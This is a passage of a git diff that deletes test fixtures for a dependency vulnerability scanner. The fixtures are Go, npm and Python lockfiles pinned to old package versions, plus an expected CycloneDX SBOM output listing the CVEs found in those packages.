-google.golang.org/protobuf v1.23.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU=
-gopkg.in/alecthomas/kingpin.v2 v2.2.6 h1:jMFz6MfLP0/4fUyZle81rXUoxOBFi19VUFKVDOQfozc=
-gopkg.in/alecthomas/kingpin.v2 v2.2.6/go.mod h1:FMv+mEhP44yOT+4EoQTLFTRgOQ1FBLkstjWtayDeSgw=
-gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
-gopkg.in/check.v1 v1.0.0-20180628173108-788fd7840127 h1:qIbj1fsPNlZgppZ+VLlY7N33q108Sa+fhmuc+sWQYwY=
-gopkg.in/check.v1 v1.0.0-20180628173108-788fd7840127/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
-gopkg.in/fsnotify.v1 v1.4.7/go.mod h1:Tz8NjZHkW78fSQdbUxIjBTcgA1z1m8ZHf0WmKUhAMys=
-gopkg.in/inf.v0 v0.9.1 h1:73M5CoZyi3ZLMOyDlQh031Cx6N9NDJ2Vvfl76EDAgDc=
-gopkg.in/inf.v0 v0.9.1/go.mod h1:cWUDdTG/fYaXco+Dcufb5Vnc6Gp2YChqWtbxRZE0mXw=
-gopkg.in/ini.v1 v1.38.2/go.mod h1:pNLf8WUiyNEtQjuu5G5vTm06TEv9tsIgeAvK8hOrP4k=
-gopkg.in/square/go-jose.v2 v2.3.1 h1:SK5KegNXmKmqE342YYN2qPHEnUYeoMiXXl1poUlI+o4=
-gopkg.in/square/go-jose.v2 v2.3.1/go.mod h1:M9dMgbHiYLoDGQrXy7OpJDJWiKiU//h+vD76mk0e1AI=
-gopkg.in/tomb.v1 v1.0.0-20141024135613-dd632973f1e7 h1:uRGJdciOHaEIrze2W8Q3AKkepLTh2hOroT7a+7czfdQ=
-gopkg.in/tomb.v1 v1.0.0-20141024135613-dd632973f1e7/go.mod h1:dt/ZhP58zS4L8KSrWDmTeBkI65Dw0HsyUHuEVlX15mw=
-gopkg.in/yaml.v2 v2.2.1/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI=
-gopkg.in/yaml.v2 v2.2.2/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI=
-gopkg.in/yaml.v2 v2.2.4/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI=
-gopkg.in/yaml.v2 v2.2.8/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI=
-gopkg.in/yaml.v2 v2.3.0/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI=
-gopkg.in/yaml.v2 v2.4.0 h1:D8xgwECY7CYvx+Y2n4sBz93Jn9JRvxdiyyo8CTfuKaY=
-gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ=
-gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c h1:dUUwHk2QECo/6vqA44rthZ8ie2QXMNeKRTHCNY2nXvo=
-gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
-honnef.co/go/tools v0.0.0-20190102054323-c2f93a96b099/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4=
-honnef.co/go/tools v0.0.0-20190106161140-3f1c8253044a/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4=
-honnef.co/go/tools v0.0.0-20190523083050-ea95bdfd59fc/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4=
-k8s.io/api v0.17.6/go.mod h1:1jKVwkj0UZ4huak/yRt3MFfU5wc32+B41SkNN5HhyFg=
-k8s.io/api v0.18.6 h1:osqrAXbOQjkKIWDTjrqxWQ3w0GkKb1KA1XkUGHHYpeE=
-k8s.io/api v0.18.6/go.mod h1:eeyxr+cwCjMdLAmr2W3RyDI0VvTawSg/3RFFBEnmZGI=
-k8s.io/apimachinery v0.17.6/go.mod h1:Lg8zZ5iC/O8UjCqW6DNhcQG2m4TdjF9kwG3891OWbbA=
-k8s.io/apimachinery v0.18.6 h1:RtFHnfGNfd1N0LeSrKCUznz5xtUP1elRGvHJbL3Ntag=
-k8s.io/apimachinery v0.18.6/go.mod h1:OaXp26zu/5J7p0f92ASynJa1pZo06YlV9fG7BoWbCko=
-k8s.io/client-go v0.17.6/go.mod h1:tX5eAbQR/Kbqv+5R93rzHQoyRnPjjW2mm9i0lXnW218=
-k8s.io/code-generator v0.17.6/go.mod h1:iiHz51+oTx+Z9D0vB3CH3O4HDDPWrvZyUgUYaIE9h9M=
-k8s.io/gengo v0.0.0-20190128074634-0689ccc1d7d6/go.mod h1:ezvh/TsK7cY6rbqRK0oQQ8IAqLxYwwyPxAX1Pzy0ii0=
-k8s.io/gengo v0.0.0-20190822140433-26a664648505/go.mod h1:ezvh/TsK7cY6rbqRK0oQQ8IAqLxYwwyPxAX1Pzy0ii0=
-k8s.io/klog v0.0.0-20181102134211-b9b56d5dfc92/go.mod h1:Gq+BEi5rUBO/HRz0bTSXDUcqjScdoY3a9IHpCEIOOfk=
-k8s.io/klog v0.3.0/go.mod h1:Gq+BEi5rUBO/HRz0bTSXDUcqjScdoY3a9IHpCEIOOfk=
-k8s.io/klog v1.0.0 h1:Pt+yjF5aB1xDSVbau4VsWe+dQNzA0qv1LlXdC2dF6Q8=
-k8s.io/klog v1.0.0/go.mod h1:4Bi6QPql/J/LkTDqv7R/cd3hPo4k2DG6Ptcz060Ez5I=
-k8s.io/kube-openapi v0.0.0-20200410145947-61e04a5be9a6/go.mod h1:GRQhZsXIAJ1xR0C9bd8UpWHZ5plfAS9fzPjJuQ6JL3E=
-k8s.io/kube-openapi v0.0.0-20200410145947-bcb3869e6f29/go.mod h1:F+5wygcW0wmRTnM3cOgIqGivxkwSWIWT5YdsDbeAOaU=
-k8s.io/utils v0.0.0-20191114184206-e782cd3c129f/go.mod h1:sZAwmy6armz5eXlNoLmJcl4F1QuKu7sr+mFQ0byX7Ew=
-layeh.com/gopher-json v0.0.0-20190114024228-97fed8db8427 h1:RZkKxMR3jbQxdCEcglq3j7wY3PRJIopAwBlx1RE71X0=
-layeh.com/gopher-json v0.0.0-20190114024228-97fed8db8427/go.mod h1:ivKkcY8Zxw5ba0jldhZCYYQfGdb2K6u9tbYK1AwMIBc=
-modernc.org/cc v1.0.0/go.mod h1:1Sk4//wdnYJiUIxnW8ddKpaOJCF37yAdqYnkxUpaYxw=
-modernc.org/golex v1.0.0/go.mod h1:b/QX9oBD/LhixY6NDh+IdGv17hgB+51fET1i2kPSmvk=
-modernc.org/mathutil v1.0.0/go.mod h1:wU0vUrJsVWBZ4P6e7xtFJEhFSNsfRLJ8H458uRjg03k=
-modernc.org/strutil v1.0.0/go.mod h1:lstksw84oURvj9y3tn8lGvRxyRC1S2+g5uuIzNfIOBs=
-modernc.org/xc v1.0.0/go.mod h1:mRNCo0bvLjGhHO9WsyuKVU4q0ceiDDDoEeWDJHrNx8I=
-sigs.k8s.io/structured-merge-diff/v2 v2.0.1/go.mod h1:Wb7vfKAodbKgf6tn1Kl0VvGj7mRH6DGaRcixXEJXTsE=
-sigs.k8s.io/structured-merge-diff/v3 v3.0.0-20200116222232-67a7b8c61874/go.mod h1:PlARxl6Hbt/+BC80dRLi1qAmnMqwqDg62YvvVkZjemw=
-sigs.k8s.io/structured-merge-diff/v3 v3.0.0 h1:dOmIZBMfhcHS09XZkMyUgkq5trg3/jRyJYFZUiaOp8E=
-sigs.k8s.io/structured-merge-diff/v3 v3.0.0/go.mod h1:PlARxl6Hbt/+BC80dRLi1qAmnMqwqDg62YvvVkZjemw=
-sigs.k8s.io/yaml v1.1.0/go.mod h1:UJmg0vDUVViEyp3mgSv9WPwZCDxu4rQW1olrI1uml+o=
-sigs.k8s.io/yaml v1.2.0 h1:kr/MCeFWJWTwyaHoR9c8EjH9OumOmoF9YGiZd7lFm/Q=
-sigs.k8s.io/yaml v1.2.0/go.mod h1:yfXDCHCao9+ENCvLSE62v9VSji2MKu5jeNfTrofGhJc=
diff --git a/tests/sca_package/examples/package-lock.json b/tests/sca_package/examples/package-lock.json
deleted file mode 100644
index 44ecfc84160..00000000000
--- a/tests/sca_package/examples/package-lock.json
+++ /dev/null
@@ -1,143 +0,0 @@
-{
-  "name": "angular-srcs",
-  "version": "13.1.0-next.0",
-  "lockfileVersion": 1,
-  "requires": true,
-  "dependencies": {
-    "bytes": {
-      "version": "0.1.0",
-      "resolved": "https://registry.npmjs.org/bytes/-/bytes-0.1.0.tgz",
-      "integrity": "sha1-xXSBIigSbWNp0VdpJahXnbP45aI="
-    },
-    "commander": {
-      "version": "0.6.1",
-      "resolved": "https://registry.npmjs.org/commander/-/commander-0.6.1.tgz",
-      "integrity": "sha1-+mihT2qUXVTbvlDYzbMyDp47GgY="
-    },
-    "connect": {
-      "version": "2.6.0",
-      "resolved": "https://registry.npmjs.org/connect/-/connect-2.6.0.tgz",
-      "integrity": "sha1-OdSuftTE2U2GcN/i1+ixObTerU8=",
-      "requires": {
-        "bytes": "0.1.0",
-        "cookie": "0.0.4",
-        "crc": "0.2.0",
-        "debug": "*",
-        "formidable": "1.0.11",
-        "fresh": "0.1.0",
-        "pause": "0.0.1",
-        "qs": "0.5.1",
-        "send": "0.0.4"
-      },
-      "dependencies": {
-        "send": {
-          "version": "0.0.4",
-          "resolved": "https://registry.npmjs.org/send/-/send-0.0.4.tgz",
-          "integrity": "sha1-LUz3mxifzQlhDhMCUQrJsOTd6AA=",
-          "requires": {
-            "debug": "*",
-            "fresh": "0.1.0",
-            "mime": "1.2.6",
-            "range-parser": "0.0.4"
-          }
-        }
-      }
-    },
-    "cookie": {
-      "version": "0.0.4",
-      "resolved": "https://registry.npmjs.org/cookie/-/cookie-0.0.4.tgz",
-      "integrity": "sha1-VFa9R67iZm6sl26oCmEFlASD/pg="
-    },
-    "crc": {
-      "version": "0.2.0",
-      "resolved": "https://registry.npmjs.org/crc/-/crc-0.2.0.tgz",
-      "integrity": "sha1-9Ehrm/ChLfg8P8oU4x4DD9q9lFQ="
-    },
-    "debug": {
-      "version": "4.3.3",
-      "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.3.tgz",
-      "integrity": "sha512-/zxw5+vh1Tfv+4Qn7a5nsbcJKPaSvCDhojn6FEl9vupwK2VCSDtEiEtqr8DFtzYFOdz63LBkxec7DYuc2jon6Q==",
-      "requires": {
-        "ms": "2.1.2"
-      }
-    },
-    "express": {
-      "version": "3.0.0",
-      "resolved": "https://registry.npmjs.org/express/-/express-3.0.0.tgz",
-      "integrity": "sha1-QeIC82J+pEK+nobV7FEkatcjOe0=",
-      "requires": {
-        "commander": "0.6.1",
-        "connect": "2.6.0",
-        "cookie": "0.0.4",
-        "crc": "0.2.0",
-        "debug": "*",
-        "fresh": "0.1.0",
-        "methods": "0.0.1",
-        "mkdirp": "0.3.3",
-        "range-parser": "0.0.4",
-        "send": "0.1.0"
-      }
-    },
-    "formidable": {
-      "version": "1.0.11",
-      "resolved": "https://registry.npmjs.org/formidable/-/formidable-1.0.11.tgz",
-      "integrity": "sha1-aPYzJaA15kS297s9ESQ7l2HeGzA="
-    },
-    "fresh": {
-      "version": "0.1.0",
-      "resolved": "https://registry.npmjs.org/fresh/-/fresh-0.1.0.tgz",
-      "integrity": "sha1-A+SwF4Qk5MLV0ZpU2IFM3JeTSFA="
-    },
-    "lodash": {
-      "version": "3.1.0",
-      "resolved": "https://registry.npmjs.org/lodash/-/lodash-3.1.0.tgz",
-      "integrity": "sha1-1BuLM1MMs74IiFMgitMAktLCeWE="
-    },
-    "methods": {
-      "version": "0.0.1",
-      "resolved": "https://registry.npmjs.org/methods/-/methods-0.0.1.tgz",
-      "integrity": "sha1-J3yQ+L7zlwlkWoNxxRw7bGSOBow="
-    },
-    "mime": {
-      "version": "1.2.6",
-      "resolved": "https://registry.npmjs.org/mime/-/mime-1.2.6.tgz",
-      "integrity": "sha1-sfhsdowCX6h7SAdfFwnyiuryA2U="
-    },
-    "mkdirp": {
-      "version": "0.3.3",
-      "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.3.3.tgz",
-      "integrity": "sha1-WV4lHBNww6aLqyE20ONIuBBa3xM="
-    },
-    "ms": {
-      "version": "2.1.2",
-      "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz",
-      "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w=="
-    },
-    "pause": {
-      "version": "0.0.1",
-      "resolved": "https://registry.npmjs.org/pause/-/pause-0.0.1.tgz",
-      "integrity": "sha1-HUCLP9t2kjuVQ9lvtMnf1TXZy10="
-    },
-    "qs": {
-      "version": "0.5.1",
-      "resolved": "https://registry.npmjs.org/qs/-/qs-0.5.1.tgz",
-      "integrity": "sha1-n2v12axsdjhOldNtFbSJgOXkrdA="
-    },
-    "range-parser": {
-      "version": "0.0.4",
-      "resolved": "https://registry.npmjs.org/range-parser/-/range-parser-0.0.4.tgz",
-      "integrity": "sha1-wEJ//vUcEKy6B4KkbJYC50T/Ygs="
-    },
-    "send": {
-      "version": "0.1.0",
-      "resolved": "https://registry.npmjs.org/send/-/send-0.1.0.tgz",
-      "integrity": "sha1-z7COvTzsm3/Bo32f+eh1qXHPRkA=",
-      "requires": {
-        "debug": "*",
-        "fresh": "0.1.0",
-        "mime": "1.2.6",
-        "range-parser": "0.0.4"
-      }
-    }
-  }
-}
diff --git a/tests/sca_package/examples/package.json b/tests/sca_package/examples/package.json
deleted file mode 100644
index dd8dfbcce20..00000000000
--- a/tests/sca_package/examples/package.json
+++ /dev/null
@@ -1,26 +0,0 @@
-{
-  "name": "angular-srcs",
-  "version": "13.1.0-next.0",
-  "private": true,
-  "description": "Angular - a web framework for modern web apps",
-  "homepage": "https://github.com/angular/angular",
-  "bugs": "https://github.com/angular/angular/issues",
-  "license": "MIT",
-  "//engines-comment": "Keep this in sync with /aio/package.json and /aio/tools/examples/shared/package.json",
-  "engines": {
-    "node": "^12.20.0 || ^14.15.0 || >=16.10.0",
-    "yarn": ">=1.22.4 <2",
-    "npm": "Please use yarn instead of NPM to install dependencies"
-  },
-  "repository": {
-    "type": "git",
-    "url": "https://github.com/angular/angular.git"
-  },
-  "scripts": {
-    "test": "bazelisk test --build_tag_filters=-view-engine-only --test_tag_filters=-view-engine-only"
-  },
-  "dependencies": {
-    "express": "3.0.0",
-    "lodash": "3.1.0"
-  }
-}
diff --git a/tests/sca_package/examples/requirements.txt b/tests/sca_package/examples/requirements.txt
deleted file mode 100644
index 557fbc0a404..00000000000
--- a/tests/sca_package/examples/requirements.txt
+++ /dev/null
@@ -1,3 +0,0 @@
-django==1.2
-flask==0.6
-requests==2.26.0
diff --git a/tests/sca_package/examples/yarn.lock b/tests/sca_package/examples/yarn.lock
deleted file mode 100644
index 3b8fb3c27db..00000000000
--- a/tests/sca_package/examples/yarn.lock
+++ /dev/null
@@ -1,17 +0,0 @@
-# THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY.
-# yarn lockfile v1
-
-
-"@angular-devkit/build-optimizer@0.0.13":
-  version "0.0.13"
-  resolved "https://registry.yarnpkg.com/@angular-devkit/build-optimizer/-/build-optimizer-0.0.13.tgz#cf397af76abe899aa909d4a735106694ca1f08cf"
-  dependencies:
-    loader-utils "^1.1.0"
-    source-map "^0.5.6"
-    typescript "^2.3.3"
-
-"@angular/animations@^4.2.5":
-  version "4.3.6"
-  resolved "https://registry.yarnpkg.com/@angular/animations/-/animations-4.3.6.tgz#bf9283ec7c8c98b32f569d84dcda10890fdc0262"
-  dependencies:
-    tslib "^1.7.1"
\ No newline at end of file
diff --git a/tests/sca_package/outputs/results_cyclonedx.xml b/tests/sca_package/outputs/results_cyclonedx.xml
deleted file mode 100644
index 1412100627e..00000000000
--- a/tests/sca_package/outputs/results_cyclonedx.xml
+++ /dev/null
@@ -1,367 +0,0 @@
-<?xml version="1.0" ?>
-<bom xmlns="http://cyclonedx.org/schema/bom/1.4" serialNumber="urn:uuid:570c5725-d340-4aee-aa2f-47ed4aceb7a0" version="1">
-	<metadata>
-		<timestamp>2023-10-12T21:55:39.825123+00:00</timestamp>
-		<tools>
-			<tool>
-				<vendor>CycloneDX</vendor>
-				<name>cyclonedx-python-lib</name>
-				<version>5.0.0</version>
-				<externalReferences>
-					<reference type="build-system">
-						<url>https://github.com/CycloneDX/cyclonedx-python-lib/actions</url>
-					</reference>
-					<reference type="distribution">
-						<url>https://pypi.org/project/cyclonedx-python-lib/</url>
-					</reference>
-					<reference type="documentation">
-						<url>https://cyclonedx-python-library.readthedocs.io/</url>
-					</reference>
-					<reference type="issue-tracker">
-						<url>https://github.com/CycloneDX/cyclonedx-python-lib/issues</url>
-					</reference>
-					<reference type="license">
-						<url>https://github.com/CycloneDX/cyclonedx-python-lib/blob/main/LICENSE</url>
-					</reference>
-					<reference type="release-notes">
-						<url>https://github.com/CycloneDX/cyclonedx-python-lib/blob/main/CHANGELOG.md</url>
-					</reference>
-					<reference type="vcs">
-						<url>https://github.com/CycloneDX/cyclonedx-python-lib</url>
-					</reference>
-					<reference type="website">
-						<url>https://github.com/CycloneDX/cyclonedx-python-lib/#readme</url>
-					</reference>
-				</externalReferences>
-			</tool>
-			<tool>
-				<vendor>bridgecrew</vendor>
-				<name>checkov</name>
-				<version>2.3.307</version>
-				<externalReferences>
-					<reference type="build-system">
-						<url>https://github.com/bridgecrewio/checkov/actions</url>
-					</reference>
-					<reference type="distribution">
-						<url>https://pypi.org/project/checkov/</url>
-					</reference>
-					<reference type="documentation">
-						<url>https://www.checkov.io/1.Welcome/What%20is%20Checkov.html</url>
-					</reference>
-					<reference type="issue-tracker">
-						<url>https://github.com/bridgecrewio/checkov/issues</url>
-					</reference>
-					<reference type="license">
-						<url>https://github.com/bridgecrewio/checkov/blob/master/LICENSE</url>
-					</reference>
-					<reference type="social">
-						<url>https://twitter.com/bridgecrewio</url>
-					</reference>
-					<reference type="vcs">
-						<url>https://github.com/bridgecrewio/checkov</url>
-					</reference>
-					<reference type="website">
-						<url>https://www.checkov.io/</url>
-					</reference>
-				</externalReferences>
-			</tool>
-		</tools>
-	</metadata>
-	<components>
-		<component type="library" bom-ref="pkg:pypi/bridgecrewio/example/path/to/requirements.txt/django@1.2">
-			<name>django</name>
-			<version>1.2</version>
-			<licenses>
-				<license>
-					<name>OSI_BDS</name>
-				</license>
-			</licenses>
-			<purl>pkg:pypi/bridgecrewio/example/path/to/requirements.txt/django@1.2</purl>
-		</component>
-		<component type="library" bom-ref="pkg:pypi/bridgecrewio/example/path/to/requirements.txt/flask@0.6">
-			<name>flask</name>
-			<version>0.6</version>
-			<licenses>
-				<license>
-					<name>DUMMY_OTHER_LICENSE</name>
-				</license>
-				<license>
-					<name>OSI_APACHE</name>
-				</license>
-			</licenses>
-			<purl>pkg:pypi/bridgecrewio/example/path/to/requirements.txt/flask@0.6</purl>
-		</component>
-		<component type="library" bom-ref="pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/dgrijalva/jwt-go@v3.2.0">
-			<name>github.com/dgrijalva/jwt-go</name>
-			<version>v3.2.0</version>
-			<licenses>
-				<license>
-					<name>Unknown</name>
-				</license>
-			</licenses>
-			<purl>pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/dgrijalva/jwt-go@v3.2.0</purl>
-		</component>
-		<component type="library" bom-ref="pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/miekg/dns@v1.1.41">
-			<name>github.com/miekg/dns</name>
-			<version>v1.1.41</version>
-			<licenses>
-				<license>
-					<name>Unknown</name>
-				</license>
-			</licenses>
-			<purl>pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/miekg/dns@v1.1.41</purl>
-		</component>
-		<component type="library" bom-ref="pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/prometheus/client_model@v0.0.0-20190129233127-fd36f4220a90">
-			<name>github.com/prometheus/client_model</name>
-			<version>v0.0.0-20190129233127-fd36f4220a90</version>
-			<licenses>
-				<license>
-					<name>Unknown</name>
-				</license>
-			</licenses>
-			<purl>pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/prometheus/client_model@v0.0.0-20190129233127-fd36f4220a90</purl>
-		</component>
-		<component type="library" bom-ref="pkg:golang/bridgecrewio/example/path/to/go.sum/golang.org/x/crypto@v0.0.1">
-			<name>golang.org/x/crypto</name>
-			<version>v0.0.1</version>
-			<licenses>
-				<license>
-					<name>Unknown</name>
-				</license>
-			</licenses>
-			<purl>pkg:golang/bridgecrewio/example/path/to/go.sum/golang.org/x/crypto@v0.0.1</purl>
-		</component>
-		<component type="library" bom-ref="pkg:pypi/bridgecrewio/example/path/to/requirements.txt/requests@2.26.0">
-			<name>requests</name>
-			<version>2.26.0</version>
-			<licenses>
-				<license>
-					<name>OSI_APACHE</name>
-				</license>
-			</licenses>
-			<purl>pkg:pypi/bridgecrewio/example/path/to/requirements.txt/requests@2.26.0</purl>
-		</component>
-		<component type="library" bom-ref="pkg:pypi/bridgecrewio/example/path/to/sub/requirements.txt/requests@2.26.0">
-			<name>requests</name>
-			<version>2.26.0</version>
-			<licenses>
-				<license>
-					<name>OSI_APACHE</name>
-				</license>
-			</licenses>
-			<purl>pkg:pypi/bridgecrewio/example/path/to/sub/requirements.txt/requests@2.26.0</purl>
-		</component>
-	</components>
-	<dependencies>
-		<dependency ref="pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/dgrijalva/jwt-go@v3.2.0"/>
-		<dependency ref="pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/miekg/dns@v1.1.41"/>
-		<dependency ref="pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/prometheus/client_model@v0.0.0-20190129233127-fd36f4220a90"/>
-		<dependency ref="pkg:golang/bridgecrewio/example/path/to/go.sum/golang.org/x/crypto@v0.0.1"/>
-		<dependency ref="pkg:pypi/bridgecrewio/example/path/to/requirements.txt/django@1.2"/>
-		<dependency ref="pkg:pypi/bridgecrewio/example/path/to/requirements.txt/flask@0.6"/>
-		<dependency ref="pkg:pypi/bridgecrewio/example/path/to/requirements.txt/requests@2.26.0"/>
-		<dependency ref="pkg:pypi/bridgecrewio/example/path/to/sub/requirements.txt/requests@2.26.0"/>
-	</dependencies>
-	<vulnerabilities>
-		<vulnerability bom-ref="e16f0ec8-73f7-40d1-a3a4-ddd23d412513">
-			<id>CVE-2016-6186</id>
-			<source>
-				<url>https://nvd.nist.gov/vuln/detail/CVE-2016-6186</url>
-			</source>
-			<ratings>
-				<rating>
-					<source>
-						<url>https://nvd.nist.gov/vuln/detail/CVE-2016-6186</url>
-					</source>
-					<score>6.1</score>
-					<severity>medium</severity>
-					<method>CVSSv3</method>
-					<vector>AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N</vector>
-				</rating>
-			</ratings>
-			<description>Cross-site scripting (XSS) vulnerability in the dismissChangeRelatedObjectPopup function in contrib/admin/static/admin/js/admin/RelatedObjectLookups.js in Django before 1.8.14, 1.9.x before 1.9.8, and 1.10.x before 1.10rc1 allows remote attackers to inject arbitrary web script or HTML via vectors involving unsafe usage of Element.innerHTML.</description>
-			<recommendation>Fixed in 1.8.14</recommendation>
-			<published>2016-08-05T17:59:00+02:00</published>
-			<affects>
-				<target>
-					<ref>pkg:pypi/bridgecrewio/example/path/to/requirements.txt/django@1.2</ref>
-				</target>
-			</affects>
-		</vulnerability>
-		<vulnerability bom-ref="4e6c652d-849d-4572-8814-1e8d0ea23cea">
-			<id>CVE-2016-7401</id>
-			<source>
-				<url>https://nvd.nist.gov/vuln/detail/CVE-2016-7401</url>
-			</source>
-			<ratings>
-				<rating>
-					<source>
-						<url>https://nvd.nist.gov/vuln/detail/CVE-2016-7401</url>
-					</source>
-					<score>7.5</score>
-					<severity>high</severity>
-					<method>CVSSv3</method>
-					<vector>AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N</vector>
-				</rating>
-			</ratings>
-			<description>The cookie parsing code in Django before 1.8.15 and 1.9.x before 1.9.10, when used on a site with Google Analytics, allows remote attackers to bypass an intended CSRF protection mechanism by setting arbitrary cookies.</description>
-			<recommendation>Fixed in 1.8.15</recommendation>
-			<published>2016-10-03T20:59:00+02:00</published>
-			<affects>
-				<target>
-					<ref>pkg:pypi/bridgecrewio/example/path/to/requirements.txt/django@1.2</ref>
-				</target>
-			</affects>
-		</vulnerability>
-		<vulnerability bom-ref="a8c5c222-bd31-49da-8341-eb1c408083f5">
-			<id>CVE-2018-1000656</id>
-			<source>
-				<url>https://nvd.nist.gov/vuln/detail/CVE-2018-1000656</url>
-			</source>
-			<ratings>
-				<rating>
-					<source>
-						<url>https://nvd.nist.gov/vuln/detail/CVE-2018-1000656</url>
-					</source>
-					<score>7.5</score>
-					<severity>high</severity>
-					<method>CVSSv3</method>
-					<vector>AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</vector>
-				</rating>
-			</ratings>
-			<description>The Pallets Project flask version Before 0.12.3 contains a CWE-20: Improper Input Validation vulnerability in flask that can result in Large amount of memory usage possibly leading to denial of service. This attack appear to be exploitable via Attacker provides JSON data in incorrect encoding. This vulnerability appears to have been fixed in 0.12.3. NOTE: this may overlap CVE-2019-1010083.</description>
-			<recommendation>Fixed in 0.12.3</recommendation>
-			<published>2018-08-20T21:31:00+02:00</published>
-			<affects>
-				<target>
-					<ref>pkg:pypi/bridgecrewio/example/path/to/requirements.txt/flask@0.6</ref>
-				</target>
-			</affects>
-		</vulnerability>
-		<vulnerability bom-ref="3aece370-9ecb-42b5-a17a-15b11e334977">
-			<id>CVE-2019-1010083</id>
-			<source>
-				<url>https://nvd.nist.gov/vuln/detail/CVE-2019-1010083</url>
-			</source>
-			<ratings>
-				<rating>
-					<source>
-						<url>https://nvd.nist.gov/vuln/detail/CVE-2019-1010083</url>
-					</source>
-					<score>7.5</score>
-					<severity>high</severity>
-					<method>CVSSv3</method>
-					<vector>AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</vector>
-				</rating>
-			</ratings>
-			<description>The Pallets Project Flask before 1.0 is affected by: unexpected memory usage. The impact is: denial of service. The attack vector is: crafted encoded JSON data. The fixed version is: 1. NOTE: this may overlap CVE-2018-1000656.</description>
-			<recommendation>Fixed in 1.0</recommendation>
-			<published>2019-07-17T16:15:00+02:00</published>
-			<affects>
-				<target>
-					<ref>pkg:pypi/bridgecrewio/example/path/to/requirements.txt/flask@0.6</ref>
-				</target>
-			</affects>
-		</vulnerability>
-		<vulnerability bom-ref="b7ad4a93-1c71-4ccd-bf19-8025c93f7022">
-			<id>CVE-2019-19844</id>
-			<source>
-				<url>https://nvd.nist.gov/vuln/detail/CVE-2019-19844</url>
-			</source>
-			<ratings>
-				<rating>
-					<source>
-						<url>https://nvd.nist.gov/vuln/detail/CVE-2019-19844</url>
-					</source>
-					<score>9.8</score>
-					<severity>critical</severity>
-					<method>CVSSv3</method>
-					<vector>AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</vector>
-				</rating>
-			</ratings>
-			<description>Django before 1.11.27, 2.x before 2.2.9, and 3.x before 3.0.1 allows account takeover. A suitably crafted email address (that is equal to an existing user\'s email address after case transformation of Unicode characters) would allow an attacker to be sent a password reset token for the matched user account. (One mitigation in the new releases is to send password reset tokens only to the registered user email address.)</description>
-			<recommendation>Fixed in 1.11.27</recommendation>
-			<published>2019-12-18T20:15:00+01:00</published>
-			<affects>
-				<target>
-					<ref>pkg:pypi/bridgecrewio/example/path/to/requirements.txt/django@1.2</ref>
-				</target>
-			</affects>
-		</vulnerability>
-		<vulnerability bom-ref="304d22ea-42da-472a-ae2a-573ac7e7aa7e">
-			<id>CVE-2020-26160</id>
-			<source>
-				<url>https://nvd.nist.gov/vuln/detail/CVE-2020-26160</url>
-			</source>
-			<ratings>
-				<rating>
-					<source>
-						<url>https://nvd.nist.gov/vuln/detail/CVE-2020-26160</url>
-					</source>
-					<score>7.7</score>
-					<severity>high</severity>
-					<method>CVSSv3</method>
-					<vector>AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N</vector>
-				</rating>
-			</ratings>
-			<description>jwt-go before 4.0.0-preview1 allows attackers to bypass intended access restrictions in situations with []string{} for m[\&quot;aud\&quot;] (which is allowed by the specification). Because the type assertion fails, \&quot;\&quot; is the value of aud. This is a security problem if the JWT token is presented to a service that lacks its own audience check.</description>
-			<recommendation>Fixed in 4.0.0rc1</recommendation>
-			<published>2020-09-30T20:15:00+02:00</published>
-			<affects>
-				<target>
-					<ref>pkg:golang/bridgecrewio/example/path/to/go.sum/github.com/dgrijalva/jwt-go@v3.2.0</ref>
-				</target>
-			</affects>
-		</vulnerability>
-		<vulnerability bom-ref="42382966-2a12-458d-8be4-6e4ae703c545">
-			<id>CVE-2020-29652</id>
-			<source>
-				<url>https://nvd.nist.gov/vuln/detail/CVE-2020-29652</url>
-			</source>
-			<ratings>
-				<rating>
-					<source>
-						<url>https://nvd.nist.gov/vuln/detail/CVE-2020-29652</url>
-					</source>
-					<score>7.5</score>
-					<severity>high</severity>
-					<method>CVSSv3</method>
